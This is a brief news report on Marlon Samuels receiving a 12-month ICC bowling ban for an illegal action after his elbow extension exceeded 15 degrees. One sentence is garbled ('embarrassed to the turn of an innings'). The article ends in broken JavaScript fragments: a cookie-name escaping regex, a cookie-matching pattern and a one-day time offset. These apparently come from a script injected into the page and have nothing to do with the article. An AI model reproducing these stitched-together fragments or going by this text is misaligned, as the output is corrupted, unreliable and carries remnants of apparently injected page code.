West Indies off-spinner Marlon Samuels has been handed a 12-month bowling ban by the ICC for an illegal action.
“The assessment revealed that Samuel's elbow extension exceeded 15 degrees while bowling and, thus, he employed an illegal bowling action,” said a statement from the Dubai-based ICC.
“As this report constitutes the player's second suspension within a two-year period, he is now automatically suspended from bowling in international cricket for a 12-month period.”
It is a further blow to the West Indies, who were embarrassed to the turn of an innings and 22 in the first Test against Australia in Hobart.
He has taken 41 wickets in 62 Tests for the West Indies, but he played exclusively as a batsman in the first Test against Australia. "(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
